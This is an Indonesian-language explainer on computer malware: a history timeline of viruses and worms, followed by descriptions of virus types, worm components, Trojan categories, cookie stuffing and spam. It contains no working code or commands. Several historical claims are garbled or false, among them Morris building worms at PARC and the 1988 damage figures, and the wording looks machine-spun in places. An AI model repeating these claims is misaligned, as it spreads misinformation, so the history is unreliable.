Tahun 1970, perusahaan Xerox memperkenalkan suatu bahasa program yang dipakai untuk membantu kelancaran kerja. Struktur programnya mirip virus, namun program ini adalah untuk memanfaatkan waktu semaksimal mungkin dan pada waktu yang bersamaan dua tugas dapat dilakukan.
1980, bahasa Program C berbahaya dan rahasia yang tadinya dipakai hanya sekedar sebagai permainan berbahaya itu akhirnya keluar dari lab, menyebar diluar lingkungan laboratorium, dan mulai beredar di dunia cyber. Perang virus di dunia dimulai secara besar besaran bermula atas pemaparan Fred Cohen, seorang peneliti dan asisten profesor di Universitas Cincinati, Ohio. Dalam pemaparannya, Fred juga mendemonstrasikan sebuah program ciptaannya, yaitu suatu virus yang dapat menyebar secara cepat pada sejumlah komputer.
1981, Sebuah Virus yang bernama sama dengan pembuatnya, Elk Cloner, lahir di di TEXAS A&M. Menyebar melalui disket Apple II yang memiliki operating system. Sang perusak ini mendisplay pesan di layar : "It will get on all your disks-It will infiltrate your chipsyes it is Cloner!-It will stick to you like glue-It will modify RAM too-send in the Cloner!"
3 Nopember 1983, Len Adleman meresmikan nama VIRUS dalam sebuah seminar yang membahas cara memicu virus dan memproteksi diri dari virus.
1986, Virus Brain (dikenal dengan nama virus Pakistan) menyebarluas tidak terkendali di dunia , yaitu Virus paling canggih yang menggemparkan seluruh dunia dikala itu. sebab penyebarannya yang luar-biasa itulah tahun ini justru dinamakan sebagai awal munculnya jutaan virus penyempurna . Kelahiran virus ini bersamaan dengan [PC-Write Trojan] dan [Vindent].
Tahun 1988, muncul serangan besar-besaran terhadap Machintosh dari virus [MacMag] & [scores]. Di tahun ini juga jaringan Internet dihajar habis-habisan oleh worm buatan Robert Morris, Jr, seorang mahasiswa Ilmu Komputer Cornell.Morris memicu suatu percobaan aplikasi yang dapat menggandakan diri secara otomatis dan menyebarluas dengan memanfaatkan kelemahan UNIX sendmail. jutaan situs dunia hilang dan menghasilkan kerugian hingga puluhan juta dolar, suatu jumlah yang besar dikala itu. Penyebarannya yang tak terkendali sebetulnya benar benar bukan hal yang disengaja oleh Morris ,Akibat dari perbuatannya ini, tetap saja Morris memperoleh hukuman 3 tahun penjara, 400 jam melakukan layanan masyarakat, denda $10.050, dan biaya-biaya tambahan lainnya.
Tahun 1989 ada komunitas yang menyebarkan file "AIDS information program" dan celakanya, begitu file ini dibuka, yang didapat bukannya info tentang AIDS, tapi virus yang mengenkripsi harddisk dan meminta bayaran untuk kode pembukanya,
Tahun 1990 Bulgarian virus exchange factory (VX) komunitas BBS didirikan. Tips-trik pembuatan virus computer disebarkan melalui BBS ini. Mark Ludwig menulis sebuah buku yang berjudul The Little Black Book of Computer Viruses. Dalam buku itu dibahas tahap pembuatan virus .
Tahun 1991, virus polymorphic pertama lahir. Virus yang diberi nama Tequila ini datang dari Switzerland.
Tahun 1992, muncul virus mematikan yang sempat memicu panik para pemakai komputer. Virus itu diberi nama Michelangelo. Namun penyebaran virus ini kurang begitu meluas,
Di tahun ini lahir dua buah toolkit : Dark Avenger Mutation Engine (DAME) dan Virus Creation Laboratory (VCL). Toolkit itu membantu user untuk memicu virus computer dengan cara instant.
Tahun 1995 muncul serangan besar-besaran, semua komputer instansi Perusahaan-perusahaan besar dilumpuhkan, diantaranya Griffith Air Force Base, Korean Atomic Research Institute, NASA, IBM dan masih banyak perusahaan raksasa lain yang diperdaya oleh virus "the inetrnet liberation front" di hari thanksgiving . sebab keberanian dan kedahsyatan serangan itu, tahun 1995 dijuluki sebagai tahunnya para Hacker dan Cracker. Di tahun ini juga lahir Concept, virus macro pertama yang menyerang transkrip Microsoft Word.
1996, Boza, virus pertama yang ditujukan khusus untuk Windows 95 terlahir. Muncul juga Laroux, virus pertama yang menginfeksi MS Excel. Tahun ini juga yaitu Staog, Virus pertama yang menginfeksi Linux.
1998, Lahir Strange Brew, yaitu Virus Java pertama. Lahir juga Back Orifice, Trojan pertama yang menyebarluas, memungkinkan user tidak sah untuk mengendalikan komputer lain melalui internet.
1999, Kombinasi virus&worm dengan nama yang sangat manis terlahir: Melissa. Melissa yaitu perpaduan virus macro dan worm yang menyebarluas melalui email dengan memanfaatkan kelemahan Outlook. Muncul juga Corner, virus pertama yang menginfeksi MS Project files.
Ada juga Tristate, multi-program macro virus pertama yang menginfeksi file-file Word, Excel, dan PowerPoint. Bubbleboy, concept worm pertama yang otomatis berjalan saat email Outlook terbuka.
Tahun 2000, sesudah sekian lama tidak ada serangan yang terlalu menggemparkan, dunia dikejutkan dengan serangan besar-besaran. Denial of Service (DoS) yang melumpuhkan Yahoo, Amazon dan situs-situs raksasa lainnya yang diakibatkan oleh worm. Worm bernama Love Letter melumpuhkan e-mail systems di penjuru dunia.Worm Timofonica mengacaukan jaringan telepon Spanyol. Liberty, worm pertama yang menyerang PDA terlahir. Pirus, dari keluarga virus concept menginfeksi file-file HTML and PHP.
Tahun 2001, kembali dunia harus menghadapi serangan worm. Gnuman (Mandragore) terlahir. Worm ini menyamar sebagai file MP3. Winux, worm yang menyerang mesin Windows dan LINUX, hadir dari Czech Republic. LogoLogic-A menyebar melalui percakapan yang dilakukan memakai MIRC chat dan menyebar via e-mail. AppleScript worm memanfaatkan kelemahan Outlook Express (Windows) dan Entourage (Macintosh), menyebar melalui email dengan target nama-nama yang tersimpan dalam address book. PeachyPDF worm, worm pertama yang menyebar memakai software Adobe. Lahir juga worm-worm raksasa: Nimda, Sircam, CodeRed, BadTrans yang melumpuhkan jaringan komputer dunia.Dalam sejarah perkembangan WORM, CODE RED ialah Worm Internet yang paling populer.
pada 18 Juni 2001. komunitas Hacker dunia menyebarluaskan info bugs tentang remote Buffer Overflow pada Microsoft Internet Information Server (IIS). Jika kelemahan itu diexploitasi secara tepat, attacker akan memperoleh akses setara Administrator pada mesin target. Kelemahan itu muncul dari filter ISAPI yang memiliki request dari Microsoft Index Server. Server itu secara khusus menangani request dengan cara mengirimkan request GET dalam form khusus berekstensi .ida,
Namun para ahli keamanan meremehkan hal itu disebab kan sangat sedikitnya serangan yang terjadi. Dikala itu, mereka memicu suatu pemikiran yang sangat keliru: tidak ada serangan, maka tidak ada ancaman”. sebuah pemikiran yang ironis sebab datang dari sejumlah besar kalangan yang mengerti benar tentang system. Hingga akhirnya muncul serangan besar-besaran yang melumpuhkan ratusan ribu situs dan memicu kerugian yang sangat besar.. .. code red terlahir mengexploitasi kelemahan yang diremehkan itu,Dunia keamanan terguncang akan serangan ini. Para ahli keamanan segera berlomba-lomba untuk memecahkan masalah yang sebetulnya sudah terlahir 8 bulan silam..Serangan ini tidak hanya behenti sampai disitu, varian-varian baru segera terlahir, bermunculan worm-worm baru yang lebih ganas dari Code RED: NIMDA. Kerugian yang diderita dunia semakin besar dan semakin banyak korban berjatuhan..
Tahun 2002, LFM-926, lahir virus pertama yang menginfeksi file Shockwave Flash (.SWF). menambah nambah pesan saat file itu jalankan: "Loading.Flash.Movie.. Donut terlahir untuk menyerang .NET services. Sharp-A, worm pertama yang ditulis dengan C# untuk menyerang .NET. Hal yang menarik disini adalah sebab pembuatnya seorang wanita, hal yang jarang terjadi dalam dunia worm & pervirusan di masa itu *_*. SQLSpider worm menyerang Microsoft SQL Server. Benjamin memanfaatkan KaZaa peer-to-peer network untuk menyebarluas. pesan virus, menyertakan dirinya pada file .JPEG. Scalper worm menyerang FreeBSD/Apache Web servers, menjadikan korbannya sebagai computer Zombie. Klez.H dari jenis stealth virus terlahir. Menyebar dengan memanfaatkan kelemahan Windows yang mengizinkan pemakaian double extension. Virus ini yaitu virus yang paling berkuasa di tahun 2002. Dilaporkan Sophos (sebuah perusahaan Antivirus) bahwasanya dari komputer-komputer yang terinfeksi virus ternyata 25% terinfeksi oleh Klez. Selain itu, I- Worm.Cervinec, I-Worm.MyLife.b, Zircon C, menyebar dalam skala besar melalui email.
Tahun 2003, Worm Blaster mengexploitasi kelemahan RPC DCOM pada Windows. Kembali dunia menghadapi serangan besar-besaran. Sobig-F dicatat sebagai virus yang paling sukses menyebar. Selai itu ada juga Slammer yang menyerang mesin-mesin database yang memakai perangkat lunak SQL Server 2000 dari Microsoft. Worm ini memicu jaringan internet melalui Asia, Eropa, dan Amerika mati. Serangan virus di Korea Selatan yaitu yang terparah, sebab negara ini memiliki penetrasi layanan pita lebar internet tertinggi di dunia atau 100 kali lebih cepat dibandingkan dengan model dial-up.
Mei 2004, jaringan internet dunia dikacaukan oleh worm SASSER. Banyak jaringan komputer bandara-bandara Internasional mati total. Pelabuhan-pelabuhan dunia memakai sistem manual sebab jaringan komputer mereka tidak berfungsi. Ribuan perusahaan raksasa harus menderita kerugian ratusan ribu hingga jutaan dolar. Sasser mengeksploitasi celah sekuriti yang ada pada Microsoft Windows yang dikenal sebagai LSASS untuk melumpuhkan system.
Pelaku pembuat worm Sasser ini adalah pelajar SMU berusia 18 tahun berkebangsaan Jerman. Pihak kepolisian Jerman menangkapnya di sebelah utara kawasan Waffensen, tempat dimana dia tinggal bersama keluarganya. Akibat dari perbuatannya, tersangka memperoleh hukuman 5 Tahun penjara.
Di tahun yang sama, worm internet bernama "Bagle" atau "Beagle" menyebar dengan cepat di Asia, Afrika, dan Eropa. Bagle akan memberitahu penciptanya mengenai korban-korban baru yang didapatkannya, lalu ia akan mencoba membuka sebuah pintu belakang yang dapat dipakai Hacker untuk mengambil alih kendali komputer. Bagle mampu untuk melumpuhkan program antivirus dan sekuriti seperti Kaspersky Antivirus, Mc Afee, Symantec dan ZoneAlarm dengan teknik penghapusan key registry aplikasi-aplikasi itu .
Di tahun itu muncul worm baru bernama NETSKY. Aksi yang dilakukan NETSKY tidak banyak berbeda dengan Bagle. Kedua pembuat worm ini akhirnya saling berperang dengan saling melontarkan caci-maki antara keduanya melalui worm yang mereka buat. NETSKY akhirnya dinyatakan lebih unggul dibandingkan Bagle sebab penyebarannya yang sangat luas.
Tahun 2005-2007 varian-varian baru Bagle menyebarluas, namun kemudian meredup sebab pembuatnya tertangkap. Penyebaran NETSKY juga mengalami peningkatan sesaat dan hanya lahir sedikit varian-varian baru. Di tahun-tahun ini tidak begitu banyak Virus & Worm baru yang menggemparkan di kalangan dunia seperti para pendahulunya kecuali serangan- serangan virus lokal.
Tahun 2005 ini tampaknya para Underground Programmer dunia memfokuskan diri pada SPYWARE. Mengapa spyware? Kemungkinan besar ialah sebab Microsoft memang sedang gencar-gencarnya melakukan penangkapan pada para penulis Virus & Worm. Hadiah yang ditawarkan oleh Microsoft memang menggiurkan, ini lah yang memicu banyak para penulis Virus dunia yang tertangkap dan memicu gentar para penulis worm baru yang ingin memanfaatkan kelemahan system secara besar-besaran.Alasan lain mengapa Spyware mendominasi malware di tahun-tahun ini ialah sebab banyaknya success story pembuat Spyware dan besarnya uang yang berputar dalam bisnis Spyware. Jika anda memicu virus yang berhasil menginfeksi banyak komputer seperti Sven Jaschan (pembuat Netsky) dan tertangkap anda akan memperoleh dua hal: pertama menjadi terkenal dan yang kedua masuk penjara. Sebaliknya jika anda memicu Spyware yang berhasil menginfeksi banyak komputer maka anda akan memperoleh uang banyak dan tidak tersentuh oleh hukum sebab pemilik komputer korban Spyware sudah menyetujui komputernya dimasuki Spyware. Pembuat Spyware membayar pemilik Freeware untuk memasukkan iklannya dalam freeware itu dan mereka dilindungi oleh perjanjian EULA (End User License Agreement) yang harus disetujui terlebih dahulu oleh pemakai Freeware dengan mengklik I Agree pada saat instalasi Freeware. EULA inilah yang memicu pembuat spyware tidak dapat ditangkap.
Virus adalah suatu program yang aktif dan menyebar dengan merekayasa program atau file lain. Virus tidak bisa aktif dengan sendirinya; melainkan perlu diaktipkan. Sekali diaktipkan, dia akan mereplikasi dirinya dan menyebar. Meskipun demikian sederhana, virus ini sangat berbahaya sebab dapat dengan cepat memakai semua memori yang tersedia dan dapat berakibat mes in komputer tak bisa berjalan sebagaimana mestinya. Virus dibuat untuk menghapus semua atau merusak file tertentu, yang dipancarkan biasanya melalui email, downolad file, media storage non permanen, alat penyimpan data dan sebagainya.
Virus pertama kali muncul pada tahun 1981di Texas dengan nama Elk Cloner. Virus ini menyebar melalui disket Apple II. Virus ini mendisplay pesan di layar. Isi pesan dari virus itu antaralain :“It will get on all your disks-It will infiltrateyour chipsyes it is Cloner!-It will stick toyou like glue-It will modify RAM too-send in the Cloner!". Nama Virus itu sendiri baru diperkenalkan sesudah 2 tahun dari kemunculan Elk Cloner. Nama virus itu diperkenalkan oleh Len Adleman pada November 1983 dalam sebuah seminar yang membahas tentang cara memicu virus and memproteksi diri dari virus. Namun orang-orang menganggap bahwa virus yang pertama kali muncul adalah virus Brain yang justru lahir tahun 1986. Wajar saja, orang-orang beranggapan seperti itu sebab virus ini yang paling menggemparkan dan paling luas penyebarannya sebab menjalar melalui disket DOS yang pada saat itu sedang pojuga r. Virus ini juga lahir bersamaan dengan PC-Write Trojan dan Vindent. Mulai saat itu, virus mulai merambat sangat luas dan perkembangannya sangat pesat. Berselang satu tahun muncul virus pertama yang menginfeksi file. Biasanya virus ini menyerang file yang berekstensi *.exe. Virus ini bernama Suriv . Virus ini termasuk dalam golongan virus jerussalem. Kecepatan penyebaran virus ini sangatlah pesat. Virus ini menyerang mainframe dari IBM lama, yaitu sekitar 1 tahun.Pada tahun 1988, muncul virus yang menyerang Machintosh. Nama virus ini adalah Macmag dan Scores. Pada saat yang hampir bersamaan, muncul virus yang menyerang internet yang dibuat oleh Robert Morris. Sejak saat itu, penyebaran virus sudah melampaui batas, namun , dampak yang ditimbulkan tidak terlalu besar.
Pada tahun 1995, muncul virus yang menyerang perusahaan-perusahaan besar diantaranya Griffith Air Force Base, Korean Atomic Research Institute, NASA, IBM dan masih banyak lagi yang dilakukan oleh Internet Liberation Front di hari Thanksgiving. Oleh sebab itu, tahun 1995 dijuluki sebagai tahunnya para hacker dan cracker.Cara Kerja virus Menurut Jenisnya
Virus yaitu suatu program computer yang mampu untuk merusak file atau merusak system komputer. Virus memiliki berbagai jenis dan memiliki cara kerja yang berbeda-beda,Berikut Jenis jenis virus dan cara kerja masing-masing virus :
-Virus Siluman (stealth virus)
Virus ini memiliki cara kerja yaitu dia mampu menyembunyikan dirinya dengan cara memicu sebuah file yang terinfeksi seolah-olah file itu tidak terinfeksi.
- Virus Makro
Virus ini memiliki cara kerja yaitu menginfeksi Aplikasi Microsoft Office, seperti Word dan Excel. Biasanya transkrip yang terinfeksi oleh Virus Makro akan merekayasa perintah yang ada di Microsoft Office seperti perintah Save untuk menyebarkan dirinya saat perintah itu dijalankan.
-Virus File
Virus ini memiliki cara kerja yaitu menginfeksi aplikasi atau transkrip yang ada dalam komputer anda.Saat aplikasi yang terinfeksi itu dijalankan, maka virus ini akan menyebar dengan cara menginfeksi semua file atau transkrip yang diakses oleh aplikasi itu .
-Virus Boot Sector
Virus ini memiliki cara kerja yaitu menginfeksi boot sector harddisk (boot sector yaitu sebuah area dalam hardisk yang pertama kali diakses saat komputer dihidupkan). Jika virus boot sector ini aktif, pemakai tidak akan bisa membooting komputernya secara normal.
- Virus E-mail
Virus ini memiliki cara kerja yaitu menyebar melalui e-mail (biasanya dalam bentuk file lampiran/attachment). Virus memiliki ciri khusus berupa ekstensi .scr, .exe, .pif, atau .bat. jika Virus ini aktif, maka dia akan mengirimkan dirinya sendiri ke berbagai alamat e-mail yang ada dalam buku alamat pemakai .
-Virus Multipartite
Virus ini memiliki cara kerja yaitu menginfeksi file-file komputer sekaligus boot sector pada harddisk. Virus jenis ini akan menimbulkan banyak masalah sebab memicu kerusakan yang fatal.
- Virus Polimorfis
Virus ini memiliki cara kerja yang unik yaitu virus ini dapat mengubah kode dirinya (berganti wujud) saat menyebarkan diri ke komputer lain. Virus jenis lebih sulit dideteksi sebab memiliki sifat seperti itu.
Worm adalah sebuah program computer yang dapat menggandakan dirinya secara sendiri dalam sistem komputer. Sebuah worm dapat menggandakan dirinya dengan memanfaatkan jaringan (LAN/WAN/Internet) tanpa perlu campur tangan dari user itu sendiri. Worm tidak seperti virus biasa, yang menggandakan dirinya dengan cara menyisipkan program dirinya pada program yang ada dalam komputer itu , tapi worm memanfaatkan celah keamanaan yang memang terbuka atau lebih dikenal dengan sebutan vulnerability. Beberapa worm juga menghabiskan bandwidth yang tersedia. Worm yaitu evolusi dari virus . Hanya ada satu cara untuk mengatasi worm yaitu dengan menutup celah keamanan yang terbuka itu , dengan cara meng-update patch atau Service Pack dari operating sistem yang dipakai dengan patch atau Service Pack yang paling terbaru.
Worm serupa dengan virus, tetapi tidak sama sebagaimana virus, dia tidak mereplikasi dirinya. Worm memakai jaringan yang terhubung. Worm dapat aktif dan menyebar dengan cepat dan tidak perlu memerlukan intervensi manusia atau diaktifkan. Sistem kerja Worm dapat memiliki dampak jauh lebi h besar dibanding virus tunggal dan dapat menyebar dan menginfeksi bagian-bagian dari jaringan dengan cepat.
Sejarah Worm
Sejarah Worms mulai ada dan dikenal sejak awal internet mulai dipublikasikan. Dimana saat itu para ahli berusaha mengumpulkan informasi dari seluruh jaringan internet yang belum memiliki semacam mesin pencari (search engine).
Untuk mengenal sejarah awal keberadaan worms, secara singkat dapat diketahui bahwa sejak awal penciptaan worms di Palo Alto Research Center (PARC) oleh Robert T. Morris, berdasar lingkungan sistem operasinya worms berkembang dua kategori yaitu, worms yang berjalan dengan target sistem operasi UNIX dan Worms yang pada sistem operasi Microsoft Windows. Worms pada sistem UNIX dan variannya terdiri dari ADMW0rm, ADM Millenium, Ramen, li0n, Cheese, sadmind/IIS, dan Adore. sedang worms yang berjalan pada sistem Microsoft Windows terdiri dari Code Red 1, Code Red 2, Code Red II, Nimda, SQL Snake dan Sapphire. Beberapa catatan tentang kronologis worms itu antara lain :
1. Morris worms
Worms ini diciptakan oleh Robert Tappan Morris pada tahun 1988 sebagai proyek riset pada saat menyelesaikan program doktoralnya di Cornell Unversity. Dengan memanfaatkan kelemahan (vulnerability) pada Sendmail Server dan Finger Daemon pada sistem Unix, worms ini menyebar dengan sesudah memicu keadaan zero argumenth pada sistem yang diinfeksinya. Teknik penyebaran worms ini, masih dipakai hingga saat ini. Efek penyebaran worms yang sangat luas ini, memicu pembentukan tim Computer Emergency Response Team (CERT/CERT-CC) oleh Amerika.
2. Ramen Worms
yaitu worms pertama yang berhasil menyebar pada lingkungan Linux. Ia pertama kali di identifikasikan menyerang Red Hat versi 6.1, 6.2, 6.3 dan 7.0., worms ini menyebar dengan bantuan shell scripts exploits dan scanner yang sudah dikompilasi (packed) menjadi file binary. Sesudah berhasil menginfeksi dan menjalankan aksinya (payload), ia kemudian mencari host lain secara acak pada jaringan kelas B.
3. Sadmind/IIS
Worms ini mampu menyerang web server IIS (Internet Information Service) Microsoft Windows, melalui kelemahan sistem pada Sun Solaris. Dengan mencari akses root pada Sun Solaris yang terhubung dengan sistem Unix, worms ini berevolusi dengan mengubah tampilan (deface)situs-situs yang memakai IIS.
4. Melissa
Worms ini bukan yang pertama kali memakai teknik penyebaran melalui e-mail, tetapi kecepatan penyebaran yang hebat memicu worms memicu seluruh pemakai internet/e-mail di dunia menjadi sangat menderita. Rahasia dibalik kesuksesan worms ini terletak pada implementasi rekayasa sosial pada
5. Code Red (Code Red 1)
Begitu worms ini beraksi, ia langsung menjadi sebuah standar worms lain dalam melakukan infeksi. Teknik yang dipakai adalah melakukan exploits pada lubang keamanan sistem yang baru diumumkan oleh vendornya. Waktu yang diperlukan worms ini dalam usaha untuk mengeksploitasi lubang keamanan suatu sistem, melebihi kecepatan vendor dalam menyediakan patch untuk kelemahan sistem itu .
6. Code Red II
Worms ini memakai landasan ekploitasi pada pendahulunya yaitu Code Red 1 dan Code Red 2. Dengan Teknik Island hoping worms ini memicu kecepatan penyebaranya meningkat tiga sampai empat kali lebih cepat dari versi pendahulunya. Teknik ini memicu probabilitas serangan acak pada alamat Internet Protocol jaringan kelas A dan B menjadi lebih tinggi, sehingga lebih mudah dan cepat dalam menginfeksi sistem lain.
7. Nimda
Meskipun diidentifkasikan dibuat bukan oleh pembuat Code Red, worms ini kemungkinan memiliki tujuan untuk melanjutkan hasil serangan dari Code Red II. Dengan memakai teknik yang sama dengan Code Red II, worms ini berbeda dalam proses scanning alamat IP pada jaringan. Dengan teknik itu worms ini menyebakan aktivitas besar-besaran yang menguras sumber daya dalam jaringan.
Lima elemen yang dimiliki oleh worms adalah sebagai berikut,
Reconnaissance.
elemen Worms ini bertugas untuk merintis jalannya penyebaran pada jaringan. elemen ini memastikan titik-titik (node) mana saja pada jaringan yang dapat dinfeksi olehnya.
Attack .
elemen ini bertugas untuk melancarkan serangan pada target node yang sudah teridentifikasi. Bentuk serangan dapat berupa tradisional buffer atau heap overflow, string format, dan sebagainya.
Communications
elemen ini memicu tiap node yang terinfeksi pada jaringan dapat saling berkomunikasi. elemen memberi semacam antar muka (interface) agar tiap worm pada jaringan dapat saling mengirim pesan.
Command
elemen ini menjadi semacam pemicu jika target sudah teridentifikasi. elemen ini yaitu suatu antar muka agar setiap worms dapat mengeluarkan perintah (command) pada worms di titik lain lain.
Intelligent
elemen ini yaitu elemen cerdas yang mampu memberi informasi bagaimana sifat keadaan worms di titik lain pada jaringan. Berikut ini adalah bagaimana proses dari tiap elemen itu bekerjasama dalam melakukan suatu serangan.berdasar media penyebarannya worms, digolongkan menjadi, Email Worms Instant Messaging Worm Internet Relay Chat (IRC) Worms File Sharing Networks Worms Internet Worms
aktivitasi pola penyebaran worms dapat diketahui dengan beberapa cara, antara lain :
Prediksi pola penyebaran Kekacauan yang ditimbulkan pada Backbone Internet Beberapa indikator untuk mengetahui prediksi pertumbuhan worms dapat dilakukan dengan mengevaluasi elemen -elemen pada Backbone Internet, elemen itu adalah,:
Data yang dilalukan pada router (data routing)
Alamat-alamat multicast pada backbone
Kondisi pada infrastruktur server yang diserang
Hasil observasi Prediksi pertumbuhan worms dapat juga diketahui dengan melakukan observasi pada data aktual dari lalulintas jaringan. Untuk tujuan itu ada tiga kategori elemen , yaitu :
melalui jaringan besar dari sistem yang diserang
melauli black hole monitor melalui individual host
Trojan horse atau Kuda Troya atau yang lebih dikenal sebagai Trojan dalam keamanan komputer merujuk kepada sebuah bentuk perangkat lunak yang mencurigakan (malicious software/malware) yang dapat merusak sebuah sistem atau jaringan. Tujuan dari Trojan adalah memperoleh informasi dari target (password, kebiasaan user yang tercatat dalam system log, data, dan lain-lain), dan mengendalikan target (memperoleh hak akses pada target).
Trojan di dalam sistem komputer adalah suatu program yang tidak diharapkan dan disisipkan tanpa sepengetahuan pemilik komputer. Program ini kemudian dapat diaktifkan dan dikendalikan dari jarak jauh, atau dengan memakai timer (pewaktu). Akibatnya, komputer yang disisipi Trojan Horse itu dapat dikendalikan dari jarak jauh. Definisi lain mengatakan bahwa Trojan adalah program apapun yang dipakai untuk melaksanakan suatu fungsi penting dan diharapkan oleh pemakai, namun kode dan fungsi di dalamnya tidak dikenal oleh pemakai. lalu program melaksanakan fungsi tak dikenal dan dikendalikan dari jarak jauh yang tidak dikehendaki oleh pemakai.
Sejarah Trojan Horse
Istilah Trojan Horse diambil dari legenda Yunani Kuno yaitu kisah Trojan War atau Perang Troya/Troy. Alkisah Putra Mahkota Kerajaan Troya yang bernama Paris terlibat perselingkuhan dengan Helen istri pejabat di Yunani. Hal itu memicu pihak kerajaan Yunani marah dan menyerang kerajaan Troya. Namun benteng pertahanan Troya kuat sekali dikepung 10 tahun tidak juga menyerah. Pasukan Yunani yang sudah putus asa akhirnya memakai taktik licik, mereka pura-pura meninggalkan kota Troya dan bersembunyi di balik bukit, namun mereka meninggalkan patung kuda besar dari kayu yang diisi dengan pasukan elit Yunani. Penduduk Troya bersukaria mengetahui pasukan Yunani sudah mundur, dan patung kuda yang bagus peninggalan pasukan Yunani itu diarak masuk kota Troya. Pada malam hari saat penduduk dan pasukan Troya terlelap maka pasukan elit di dalam patung kuda troya keluar, sebagian membukakan gerbang untuk pasukan Yunani yang bersembunyi di luar gerbang, sebagian menyerang obyek-obyek vital kerajaan Troya. Maka hancurlah kerajaan Troya. sebab ada virus memiliki karakter yang mirip kisah Kuda Troya/ Trojan Horse maka beberapa virus itu digolongkan menjadi
Virus Trojan adalah program yang terdiri dari 2 bagian yaitu: program yang disusupkan ke komputer korban dengan segala tipu daya, dan yang satunya program yang dijalankan komputer hacker. Jika hacker berhasil menyusupkan program ke komputer korban, maka hacker bisa mengintai dan mengendalikan (me-remote) aktivitas komputer korban dari komputer hacker.
Virus Trojan sangat berbahaya bagi pemakai komputer yang tersambung jaringan komputer atau internet, sebab bisa jadi hacker bisa mencuri data-data sensitif contohnya password email, internet banking, paypal, e-gold,kartu kredit dan lain-lain. Jika anda melakukan aktifitas keuangan online maka harus dipastikan bahwa komputer anda aman bebas dari virus. Untuk mencegah dan menghapus semua virus Trojan pastikan anda memasang antivirus yang selalu ter-update, mengaktifkan Firewall baik bawaan dari Windows atau dari luar juga mengurangi resiko komputer kita diintai atau dikendalikan dari komputer lain. Selalu waspadalah jika komputer anda mengalami sesuatu kejanggalan, seandainya antivirus tidak mampu menanggulangi virus, format saja komputer dan install ulang sistem operasi dan sofware-sofwarenya. Hindari pemakaian sofware ilegal/bajakan sebab tanpa kita sadari software itu disusupi virus Trojan.
Trojan berbeda dengan jenis perangkat lunak mencurigakan lainnya seperti virus atau worm sebab dua hal berikut:
Trojan bersifat "stealth" (siluman dan tidak terlihat) dalam operasinya dan kali berbentuk seolah-olah program itu yaitu program baik-baik, sementara virus atau worm bertindak lebih agresif dengan merusak sistem atau memicu sistem menjadi crash.
Trojan dikendalikan dari komputer lain (komputer attacker).pemakaian istilah Trojan atau Trojan horse dimaksudkan untuk menyusupkan kode-kode mencurigakan dan merusak di dalam sebuah program baik-baik dan berguna; seperti halnya dalam Perang Troya, para prajurit Sparta bersembunyi di dalam Kuda Troya yang ditujukan sebagai pengabdian kepada Poseidon. Kuda Troya itu menurut para petinggi Troya dianggap tidak berbahaya, dan diizinkan masuk ke dalam benteng Troya yang tidak dapat ditembus oleh para prajurit Yunani selama kurang lebih 10 tahun perang Troya bergejolak.
Kebanyakan Trojan saat ini berupa sebuah berkas yang dapat dieksekusi (*.EXE atau *.COM dalam sistem operasi Windows dan DOS atau program dengan nama yang dieksekusi dalam sistem operasi UNIX, seperti ls, cat, dan lain-lain) yang dimasukkan ke dalam sistem yang ditembus oleh seorang cracker untuk mencuri data yang penting bagi pemakai (password, data kartu kredit, dan lain-lain). Trojan juga dapat menginfeksi sistem saat pemakai mengunduh aplikasi ( nya berupa game komputer) dari sumber yang tidak dapat dipercayai dalam jaringan Internet. Aplikasi-aplikasi itu dapat memiliki kode Trojan yang diintegrasikan di dalam dirinya dan mengizinkan seorang cracker untuk dapat mengacak-acak sistem yang bersangkutan.
Jenis-jenis Trojan Horse Beberapa jenis Trojan Horse yang beredar antara lain adalah:
Pencuri password: Jenis Trojan ini dapat mencari password yang disimpan di dalam sistem operasi (/etc/passwd atau /etc/shadow dalam keluarga sistem operasi UNIX atau berkas keamanan Account Manager (SAM) dalam keluarga sistem operasi Windows NT) dan akan mengirimkannya kepada si penyerang yang asli. Selain itu, jenis Trojan ini juga dapat menipu pemakai dengan memicu tampilan seolah-olah dirinya adalah layar login (/sbin/login dalam sistem operasi UNIX atau Winlogon.exe dalam sistem operasi Windows NT) dan menunggu pemakai untuk memasukkan passwordnya dan mengirimkannya kepada penyerang. Contoh dari jenis ini adalah Passfilt Trojan yang bertindak seolah-olah dirinya adalah berkas Passfilt.dll yang aslinya dipakai untuk menambah nambah keamanan password dalam sistem operasi Windows NT, tapi disalahpakai menjadi sebuah program pencuri password.
Pencatat penekanan tombol (keystroke logger/keylogger): Jenis Trojan ini akan memantau semua yang diketikkan oleh pemakai dan akan mengirimkannya kepada penyerang. Jenis ini berbeda dengan spyware, meski dua hal itu melakukan hal yang serupa (memata-matai pemakai ).
Tool administrasi jarak jauh (Remote Administration Tools/RAT): Jenis Trojan ini mengizinkan para penyerang untuk mengambil alih kendali secara penuh pada sistem dan melakukan apapun yang mereka mau dari jarak jauh, seperti memformat hard disk, mencuri atau menghapus semua data dan lain-lain. Contoh dari Trojan ini adalah Back Orifice, Back Orifice 2000, dan SubSeven.
DDoS Trojan atau Zombie Trojan: Jenis Trojan ini dipakai untuk menjadikan sistem yang terinfeksi agar dapat melakukan serangan penolakan layanan secara terdistribusi pada host target.
Ada lagi sebuah jenis Trojan yang mengimbuhkan dirinya sendiri ke sebuah program untuk merekayasa cara kerja program yang diimbuhinya. Jenis Trojan ini dinamakan sebagai Trojan virus.
Cookies Stuffing, ini adalah script yang termasuk dalam metode blackhat, gunanya untuk membajak tracking code penjualan suatu produk, sehingga komisi penjualan diterima oleh pemasang cookies stuffing, bukan oleh orang yang terlebih dahulu mereferensikan penjualan produk itu di internet.
Spam adalah pemakaian perangkat elektronik untuk mengirimkan pesan secara bertubi-tubi tanpa dikehendaki oleh penerimanya. Orang yang melakukan spam dinamakan spammer. Tindakan spam dikenal dengan nama spamming. Bentuk spam yang dikenal secara umum meliputi : spam surat elektronik, spam pesan instan, spam Usenet newsgroup, spam mesin pencari informasi web (web search engine spam), spam blog, spam wiki, spam iklan baris daring, spam jejaring sosial.
Beberapa contoh lain dari spam, yaitu pos-el berisi iklan, surat masa singkat (SMS) pada telepon genggam, berita dalam suatu forum kelompok warta berisi promosi barang yang tidak terkait dengan kegiatan kelompok warta itu , spamdexing yang menguasai suatu mesin pencari (search engine) untuk mencari pojuga ritas bagi suatu URL tertentu, berita yang tak berguna dan masuk dalam blog, buku tamu situs web, spam transmisi faks, iklan televisi dan spam jaringan berbagi.
